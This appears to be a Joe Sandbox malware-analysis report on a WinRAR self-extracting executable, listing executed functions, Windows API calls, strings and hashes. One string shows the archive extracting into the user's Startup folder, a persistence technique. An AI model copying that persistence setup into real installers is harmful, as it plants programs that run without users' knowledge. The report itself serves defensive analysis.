25754->25809 25755->25757 25760 d2eff3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25755->25760 25811 d32ed2 MultiByteToWideChar 25755->25811 25757->25740 25758 d2f479 25766 d2f4fe 25758->25766 25817 d4a09e 26 API calls 2 library calls 25758->25817 25760->25757 25760->25758 25774 d330f5 WideCharToMultiByte 25760->25774 25812 d2f8d1 50 API calls __vsnprintf 25760->25812 25813 d47571 26 API calls 3 library calls 25760->25813 25814 d4a09e 26 API calls 2 library calls 25760->25814 25815 d48a18 26 API calls 2 library calls 25760->25815 25816 d2f59c 78 API calls 25760->25816 25762 d2f48e 25818 d48a18 26 API calls 2 library calls 25762->25818 25764 d2f4e6 25819 d2f59c 78 API calls 25764->25819 25765 d2f534 25767 d47730 26 API calls 25765->25767 25766->25765 25769 d2f581 78 API calls 25766->25769 25770 d2f54d 25767->25770 25769->25766 25771 d47730 26 API calls 25770->25771 25771->25757 25774->25760 25778 d2ed75 25777->25778 25778->25683 25780 d2ab4a 25779->25780 25781 d2abab CreateFileW 25780->25781 25782 d2abcc GetLastError 25781->25782 25785 d2ac1b 25781->25785 25783 d2cf32 GetCurrentDirectoryW 25782->25783 25784 d2abec 25783->25784 25784->25785 25787 d2abf0 CreateFileW GetLastError 25784->25787 25786 d2ac5f 25785->25786 25788 d2ac45 SetFileTime 25785->25788 25786->25743 25787->25785 25789 d2ac15 25787->25789 25788->25786 25789->25785 25791 d47769 25790->25791 25792 d4776d 25791->25792 25803 d47795 25791->25803 25820 d4a7eb 20 API calls _abort 25792->25820 25794 d47772 25821 d451b9 26 API calls _abort 25794->25821 25795 d47ab9 25797 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25795->25797 25799 d47ac6 25797->25799 25798 d4777d 25800 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25798->25800 25799->25744 25801 d47789 25800->25801 25801->25744 25803->25795 25822 d47650 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25803->25822 25805 d2ae6c 25804->25805 25808 d2ae73 25804->25808 25805->25754 25807 d2a9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25807->25808 25808->25805 25808->25807 25823 d277bd 77 API calls 25808->25823 25809->25754 25810->25751 25811->25760 25812->25760 25813->25760 25814->25760 25815->25760 25816->25760 25817->25762 25818->25764 25819->25766 25820->25794 25821->25798 25822->25803 25823->25808 25825 d490a3 _unexpected 25824->25825 25826 d490bc 25825->25826 25827 d490aa 25825->25827 25848 d4bdf1 EnterCriticalSection 25826->25848 25860 d491f1 GetModuleHandleW 25827->25860 25830 d490af 25830->25826 25861 d49235 GetModuleHandleExW 25830->25861 25831 d49161 25849 d491a1 25831->25849 25835 d49138 25839 d49150 25835->25839 25844 d49e61 _abort 5 API calls 25835->25844 25837 d4917e 25852 d491b0 25837->25852 25838 d491aa 25870 d53550 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25838->25870 25845 d49e61 _abort 5 API calls 25839->25845 25840 d490c3 25840->25831 25840->25835 25869 d49bb0 20 API calls _abort 25840->25869 25844->25839 25845->25831 25848->25840 25871 d4be41 LeaveCriticalSection 25849->25871 25851 d4917a 25851->25837 25851->25838 25872 d4c236 25852->25872 25855 d491de 25858 d49235 _abort 8 API calls 25855->25858 25856 d491be GetPEB 25856->25855 25857 d491ce GetCurrentProcess TerminateProcess 25856->25857 25857->25855 25859 d491e6 ExitProcess 25858->25859 25860->25830 25862 d49282 25861->25862 25863 d4925f GetProcAddress 25861->25863 25865 d49291 25862->25865 25866 d49288 FreeLibrary 25862->25866 25864 d49274 25863->25864 25864->25862 25867 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25865->25867 25866->25865 25868 d490bb 25867->25868 25868->25826 25869->25835 25871->25851 25873 d4c251 25872->25873 25874 d4c25b 25872->25874 25876 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25873->25876 25875 d4be58 _abort 5 API calls 25874->25875 25875->25873 25877 d491ba 25876->25877 25877->25855 25877->25856 25882 d3f002 25883 d3f00f 25882->25883 25884 d2f937 53 API calls 25883->25884 25885 d3f01c 25884->25885 25886 d24a20 _swprintf 51 API calls 25885->25886 25887 d3f031 SetDlgItemTextW 25886->25887 25888 d3c758 5 API calls 25887->25888 25889 d3f04e 25888->25889 25996 d21800 86 API calls Concurrency::cancel_current_task 26048 d40600 27 API calls 26030 d53100 CloseHandle 25891 d2b20a 25892 d2b218 25891->25892 25893 d2b21f 25891->25893 25894 d2b22c GetStdHandle 25893->25894 25898 d2b23b 25893->25898 25894->25898 25895 d2b293 WriteFile 25895->25898 25896 d2b264 WriteFile 25897 d2b25f 25896->25897 25896->25898 25897->25896 25897->25898 25898->25892 25898->25895 25898->25896 25898->25897 25900 d2b325 25898->25900 25902 d2765a 78 API calls 25898->25902 25903 d27951 77 API calls 25900->25903 25902->25898 25903->25892 26069 d32f0b GetCPInfo IsDBCSLeadByte 25908 d3f431 25909 d3f335 25908->25909 25910 d3f9e9 ___delayLoadHelper2@8 14 API calls 25909->25910 25910->25909 25998 d22430 26 API calls std::bad_exception::bad_exception 26071 d49330 52 API calls 2 library calls 25999 d22037 142 API calls __EH_prolog 26032 d30534 FreeLibrary 26072 d40733 20 API calls 25931 d2213d 25932 d22148 25931->25932 25933 d22150 25931->25933 25937 d22162 27 API calls Concurrency::cancel_current_task 25932->25937 25934 d2214e 25933->25934 25936 d3febe 27 API calls 25933->25936 25936->25934 25937->25934 26033 d26920 41 API calls __EH_prolog 26000 d3d420 91 API calls _swprintf 25941 d4a620 25949 d4bf6f 25941->25949 25944 d4a634 25946 d4a63c 25947 d4a649 25946->25947 25957 d4a650 11 API calls 25946->25957 25950 d4be58 _abort 5 API calls 25949->25950 25951 d4bf96 25950->25951 25952 d4bfae TlsAlloc 25951->25952 25953 d4bf9f 25951->25953 25952->25953 25954 d40d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25953->25954 25955 d4a62a 25954->25955 25955->25944 25956 d4a599 20 API calls 2 library calls 25955->25956 25956->25946 25957->25944 26001 d21025 29 API calls 25961 d3f32b 14 API calls ___delayLoadHelper2@8 25963 d2ca2e 25964 d2ca40 __cftof 25963->25964 25967 d323fb 25964->25967 25970 d323bd GetCurrentProcess GetProcessAffinityMask 25967->25970 25971 d2ca97 25970->25971 26002 d3742e 137 API calls __InternalCxxFrameHandler 26051 d4962a 55 API calls _free

                                                                              Executed Functions

                                                                              Function 00D3F05C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202filesleeptimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00D31B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00D31B9C
                                                                                • Part of subcall function 00D31B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D31BAE
                                                                                • Part of subcall function 00D31B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D31BDF
                                                                                • Part of subcall function 00D3B65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D3B665
                                                                                • Part of subcall function 00D3BD1B: OleInitialize.OLE32(00000000), ref: 00D3BD34
                                                                                • Part of subcall function 00D3BD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D3BD6B
                                                                                • Part of subcall function 00D3BD1B: SHGetMalloc.SHELL32(00D6A460), ref: 00D3BD75
                                                                              • GetCommandLineW.KERNEL32 ref: 00D3F09B
                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D3F0C5
                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00D3F0D6
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00D3F127
                                                                                • Part of subcall function 00D3ED2E: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D3ED44
                                                                                • Part of subcall function 00D3ED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D3ED80
                                                                                • Part of subcall function 00D30752: _wcslen.LIBCMT ref: 00D30776
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00D3F12E
                                                                              • GetModuleFileNameW.KERNEL32(00000000,00D80CC0,00000800), ref: 00D3F148
                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00D80CC0), ref: 00D3F154
                                                                              • GetLocalTime.KERNEL32(?), ref: 00D3F15F
                                                                              • _swprintf.LIBCMT ref: 00D3F19E
                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D3F1B3
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00D3F1BA
                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00D3F1D1
                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 00D3F222
                                                                              • Sleep.KERNEL32(?), ref: 00D3F250
                                                                              • DeleteObject.GDI32 ref: 00D3F289
                                                                              • DeleteObject.GDI32(?), ref: 00D3F299
                                                                              • CloseHandle.KERNEL32 ref: 00D3F2DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                              • API String ID: 3014515783-3710569615
                                                                              • Opcode ID: 5ea14fe98374e3ed20e2b820a0b0bae9ad459ec5a37cb34e41f17d14960a0dc2
                                                                              • Instruction ID: 040f20e01990a65966be512d2ac5e30d6f0cf5d34fd59093002c0a3e03d50a87
                                                                              • Opcode Fuzzy Hash: 5ea14fe98374e3ed20e2b820a0b0bae9ad459ec5a37cb34e41f17d14960a0dc2
                                                                              • Instruction Fuzzy Hash: D561C575900304BFD320AB65EC49F6B7BACEB45745F040529F985D23A1EB749D88CB72
                                                                              Function 00D2BA94 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 949 d2ba94-d2bab8 call d3ffd0 952 d2bb20-d2bb29 FindNextFileW 949->952 953 d2baba-d2bac7 FindFirstFileW 949->953 954 d2bb3b-d2bbf8 call d3192f call d2d71d call d32924 * 3 952->954 955 d2bb2b-d2bb39 GetLastError 952->955 953->954 956 d2bac9-d2badb call d2cf32 953->956 960 d2bbfd-d2bc0a 954->960 957 d2bb12-d2bb1b 955->957 964 d2baf7-d2bb00 GetLastError 956->964 965 d2badd-d2baf5 FindFirstFileW 956->965 957->960 966 d2bb02-d2bb05 964->966 967 d2bb10 964->967 965->954 965->964 966->967 969 d2bb07-d2bb0a 966->969 967->957 969->967 971 d2bb0c-d2bb0e 969->971 971->957
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D2B98B,000000FF,?,?), ref: 00D2BABD
                                                                                • Part of subcall function 00D2CF32: _wcslen.LIBCMT ref: 00D2CF56
                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00D2B98B,000000FF,?,?), ref: 00D2BAEB
                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D2B98B,000000FF,?,?), ref: 00D2BAF7
                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D2B98B,000000FF,?,?), ref: 00D2BB21
                                                                              • GetLastError.KERNEL32(?,?,?,?,00D2B98B,000000FF,?,?), ref: 00D2BB2D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                              • String ID:
                                                                              • API String ID: 42610566-0
                                                                              • Opcode ID: 490c74e6bba83ec0bbacccc51619fad5a93aca824f2405c3a9f41869b0a726e0
                                                                              • Instruction ID: be0a085efad4a426f97d055ef3b5ca2746853c436ceb32076aab0abfbc15a9cc
                                                                              • Opcode Fuzzy Hash: 490c74e6bba83ec0bbacccc51619fad5a93aca824f2405c3a9f41869b0a726e0
                                                                              • Instruction Fuzzy Hash: A9418472900629ABCB25DF64DC84AE9B3B8FB58364F140196F96DE3240D774AE94CF70
                                                                              Function 00D292C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D292CB
                                                                                • Part of subcall function 00D2D656: _wcsrchr.LIBVCRUNTIME ref: 00D2D660
                                                                                • Part of subcall function 00D2CAA0: _wcslen.LIBCMT ref: 00D2CAA6
                                                                                • Part of subcall function 00D31907: _wcslen.LIBCMT ref: 00D3190D
                                                                                • Part of subcall function 00D2B5D6: _wcslen.LIBCMT ref: 00D2B5E2
                                                                                • Part of subcall function 00D2B5D6: __aulldiv.LIBCMT ref: 00D2B60E
                                                                                • Part of subcall function 00D2B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00D2B615
                                                                                • Part of subcall function 00D2B5D6: _swprintf.LIBCMT ref: 00D2B640
                                                                                • Part of subcall function 00D2B5D6: _wcslen.LIBCMT ref: 00D2B64A
                                                                                • Part of subcall function 00D2B5D6: _swprintf.LIBCMT ref: 00D2B6A0
                                                                                • Part of subcall function 00D2B5D6: _wcslen.LIBCMT ref: 00D2B6AA
                                                                                • Part of subcall function 00D24727: __EH_prolog.LIBCMT ref: 00D2472C
                                                                                • Part of subcall function 00D2A212: __EH_prolog.LIBCMT ref: 00D2A217
                                                                                • Part of subcall function 00D2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2B5B5,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B8FA
                                                                                • Part of subcall function 00D2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2B5B5,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B92B
                                                                              Strings
                                                                              • __tmp_reference_source_, xrefs: 00D29596
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                                                                              • String ID: __tmp_reference_source_
                                                                              • API String ID: 70197177-685763994
                                                                              • Opcode ID: 2d76e9e1c13b5a639dea7d9cad31b4d63092c7682d333bbe0968836f7d0768ac
                                                                              • Instruction ID: f0d4e7a1b6889b5366eea6690731e3fc57fa896a575a3e7b79102da5bfde0b1c
                                                                              • Opcode Fuzzy Hash: 2d76e9e1c13b5a639dea7d9cad31b4d63092c7682d333bbe0968836f7d0768ac
                                                                              • Instruction Fuzzy Hash: 00A2F671904265AEDF15DF74D8A5BE9FBA4FF25308F0C01B9E8499B282D7309988CB71
                                                                              Function 00D491B0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00D49186,00000000,00D5D570,0000000C,00D492DD,00000000,00000002,00000000), ref: 00D491D1
                                                                              • TerminateProcess.KERNEL32(00000000,?,00D49186,00000000,00D5D570,0000000C,00D492DD,00000000,00000002,00000000), ref: 00D491D8
                                                                              • ExitProcess.KERNEL32 ref: 00D491EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: c7f84ce50a618b4b0eb0acc14190d6390b7584174d0f3892cc26617bd8969388
                                                                              • Instruction ID: e336cc0ca9e8fb3185e472b7734d475df179cbf023eda69f2b048f51f99cf6e5
                                                                              • Opcode Fuzzy Hash: c7f84ce50a618b4b0eb0acc14190d6390b7584174d0f3892cc26617bd8969388
                                                                              • Instruction Fuzzy Hash: F5E04631000348ABCF216F65CD4CA8A7B6AEB40356F000014FD0C8B231CB75ED82CAB0
                                                                              Function 00D3C9D0 Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 734windowfilesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D3C9D5
                                                                                • Part of subcall function 00D212F6: GetDlgItem.USER32(00000000,00003021), ref: 00D2133A
                                                                                • Part of subcall function 00D212F6: SetWindowTextW.USER32(00000000,00D545F4), ref: 00D21350
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3CAC1
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3CADF
                                                                              • IsDialogMessageW.USER32(?,?), ref: 00D3CAF2
                                                                              • TranslateMessage.USER32(?), ref: 00D3CB00
                                                                              • DispatchMessageW.USER32(?), ref: 00D3CB0A
                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00D3CB2D
                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00D3CB50
                                                                              • GetDlgItem.USER32(?,00000068), ref: 00D3CB73
                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D3CB8E
                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00D545F4), ref: 00D3CBA1
                                                                                • Part of subcall function 00D3E598: _wcslen.LIBCMT ref: 00D3E5C2
                                                                              • SetFocus.USER32(00000000), ref: 00D3CBA8
                                                                              • _swprintf.LIBCMT ref: 00D3CC07
                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00D3CC6A
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00D3CC92
                                                                              • GetTickCount.KERNEL32 ref: 00D3CCB0
                                                                              • _swprintf.LIBCMT ref: 00D3CCC8
                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00D3CCFA
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00D3CD4D
                                                                              • _swprintf.LIBCMT ref: 00D3CD84
                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 00D3CDD8
                                                                              • GetCommandLineW.KERNEL32 ref: 00D3CDEE
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00D71482,00000400,00000001,00000001), ref: 00D3CE45
                                                                              • Sleep.KERNEL32(00000064), ref: 00D3CEB5
                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000421C,00D71482,00000400), ref: 00D3CEDE
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00D3CEE7
                                                                              • _swprintf.LIBCMT ref: 00D3CF1A
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3CF79
                                                                              • SetDlgItemTextW.USER32(?,00000065,00D545F4), ref: 00D3CF90
                                                                              • GetDlgItem.USER32(?,00000065), ref: 00D3CF99
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00D3CFA8
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D3CFB7
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3D064
                                                                              • _wcslen.LIBCMT ref: 00D3D0BA
                                                                              • _swprintf.LIBCMT ref: 00D3D0E4
                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D3D12E
                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00D3D148
                                                                              • GetDlgItem.USER32(?,00000068), ref: 00D3D151
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00D3D167
                                                                              • GetDlgItem.USER32(?,00000066), ref: 00D3D181
                                                                              • SetWindowTextW.USER32(00000000,C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup), ref: 00D3D1A3
                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00D3D203
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3D216
                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7B0,00000000,?), ref: 00D3D2B9
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00D3D393
                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00D3D3D5
                                                                                • Part of subcall function 00D3D884: __EH_prolog.LIBCMT ref: 00D3D889
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3D3F9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                              • API String ID: 1004948406-504123927
                                                                              • Opcode ID: d46c52986778f57c7e3930adc48f9806c4b0eab93d85773ea0d5c4430aef3573
                                                                              • Instruction ID: a8654720b53e3634083dcd69c4960e73cfbc05ebd0461b6c192c6b94d106186e
                                                                              • Opcode Fuzzy Hash: d46c52986778f57c7e3930adc48f9806c4b0eab93d85773ea0d5c4430aef3573
                                                                              • Instruction Fuzzy Hash: 9642D171950318BEEB21AB64AC4AFBE7BADEB11704F080055F644F62D2CBB45949CF72
                                                                              Function 00D31B83 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 274 d31b83-d31ba6 call d3ffd0 GetModuleHandleW 277 d31c07-d31e68 274->277 278 d31ba8-d31bbf GetProcAddress 274->278 279 d31f34-d31f60 GetModuleFileNameW call d2d6a7 call d3192f 277->279 280 d31e6e-d31e79 call d489ee 277->280 281 d31bc1-d31bd7 278->281 282 d31bd9-d31be9 GetProcAddress 278->282 297 d31f62-d31f6e call d2c619 279->297 280->279 292 d31e7f-d31ead GetModuleFileNameW CreateFileW 280->292 281->282 283 d31c05 282->283 284 d31beb-d31c00 282->284 283->277 284->283 294 d31f28-d31f2f CloseHandle 292->294 295 d31eaf-d31ebb SetFilePointer 292->295 294->279 295->294 298 d31ebd-d31ed9 ReadFile 295->298 304 d31f70-d31f7b call d31b3b 297->304 305 d31f9d-d31fc4 call d2d71d GetFileAttributesW 297->305 298->294 300 d31edb-d31f00 298->300 302 d31f1d-d31f26 call d3169e 300->302 302->294 311 d31f02-d31f1c call d31b3b 302->311 304->305 313 d31f7d-d31f9b CompareStringW 304->313 314 d31fc6-d31fca 305->314 315 d31fce 305->315 311->302 313->305 313->314 314->297 317 d31fcc 314->317 318 d31fd0-d31fd5 315->318 317->318 319 d31fd7 318->319 320 d3200c-d3200e 318->320 323 d31fd9-d32000 call d2d71d GetFileAttributesW 319->323 321 d32014-d3202b call d2d6f1 call d2c619 320->321 322 d3211b-d32125 320->322 333 d32093-d320c6 call d24a20 AllocConsole 321->333 334 d3202d-d3208e call d31b3b * 2 call d2f937 call d24a20 call d2f937 call d3b7f4 321->334 329 d32002-d32006 323->329 330 d3200a 323->330 329->323 332 d32008 329->332 330->320 332->320 339 d32113-d32115 ExitProcess 333->339 340 d320c8-d3210d GetCurrentProcessId AttachConsole call d44fa3 GetStdHandle WriteConsoleW Sleep FreeConsole 333->340 334->339 340->339
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00D31B9C
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D31BAE
                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D31BDF
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D31E89
                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D31EA3
